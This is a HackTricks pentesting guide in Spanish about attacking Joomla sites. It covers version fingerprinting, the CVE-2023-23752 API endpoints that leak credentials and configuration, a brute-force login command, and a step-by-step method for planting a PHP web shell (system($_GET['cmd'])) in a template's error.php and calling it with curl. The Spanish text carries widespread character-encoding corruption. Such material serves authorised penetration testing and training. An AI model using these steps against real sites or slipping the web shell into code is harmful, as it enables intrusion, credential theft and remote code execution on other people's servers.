Joomla

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Estad铆sticas de Joomla

Joomla recopila algunas estad铆sticas de uso an贸nimas, como la distribuci贸n de las versiones de Joomla, PHP y bases de datos, as铆 como los sistemas operativos de servidor en uso en las instalaciones de Joomla. Estos datos se pueden consultar a trav茅s de su API p煤blica.

bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeraci贸n

Descubrimiento/Recopilaci贸n de Informaci贸n

  • Verifica el meta
bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Versi贸n

  • En /administrator/manifests/files/joomla.xml puedes ver la versi贸n.
  • En /language/en-GB/en-GB.xml puedes obtener la versi贸n de Joomla.
  • En plugins/system/cache/cache.xml puedes ver una versi贸n aproximada.

Autom谩tico

bash
droopescan scan joomla --url http://joomla-site.local/

En 80,443 - La metodolog铆a de pentesting web es una secci贸n sobre esc谩neres de CMS que pueden escanear Joomla.

Divulgaci贸n de Informaci贸n No Autenticada:

Las versiones desde 4.0.0 hasta 4.2.7 son vulnerables a la divulgaci贸n de informaci贸n no autenticada (CVE-2023-23752) que volcar谩 credenciales y otra informaci贸n.

  • Usuarios: http://<host>/api/v1/users?public=true
  • Archivo de Configuraci贸n: http://<host>/api/index.php/v1/config/application?public=true

M贸dulo MSF: scanner/http/joomla_api_improper_access_checks o script ruby: 51334

Fuerza Bruta

Puedes usar este script para intentar forzar el inicio de sesi贸n.

shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Si lograste obtener credenciales de administrador, puedes RCE dentro de 茅l agregando un fragmento de c贸digo PHP para obtener RCE. Podemos hacer esto personalizando una plantilla.

  1. Haz clic en Templates en la parte inferior izquierda bajo Configuration para abrir el men煤 de plantillas.
  2. Haz clic en el nombre de una plantilla. Elijamos protostar bajo el encabezado de columna Template. Esto nos llevar谩 a la p谩gina Templates: Customise.
  3. Finalmente, puedes hacer clic en una p谩gina para abrir el c贸digo fuente de la p谩gina. Elijamos la p谩gina error.php. Agregaremos una l铆nea de c贸digo PHP para obtener ejecuci贸n de c贸digo de la siguiente manera:
  4. system($_GET['cmd']);
  5. Guardar y cerrar
  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

De XSS a RCE

  • JoomSploit: Script de explotaci贸n de Joomla que eleva XSS a RCE u otras vulnerabilidades cr铆ticas. Para m谩s informaci贸n, consulta esta publicaci贸n. Proporciona soporte para las versiones de Joomla 5.X.X, 4.X.X y 3.X.X, y permite:
  • Escalamiento de privilegios: Crea un usuario en Joomla.
  • (RCE) Edici贸n de plantillas integradas: Edita plantillas integradas en Joomla.
  • (Personalizado) Explotaciones personalizadas: Explotaciones personalizadas para complementos de Joomla de terceros.

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks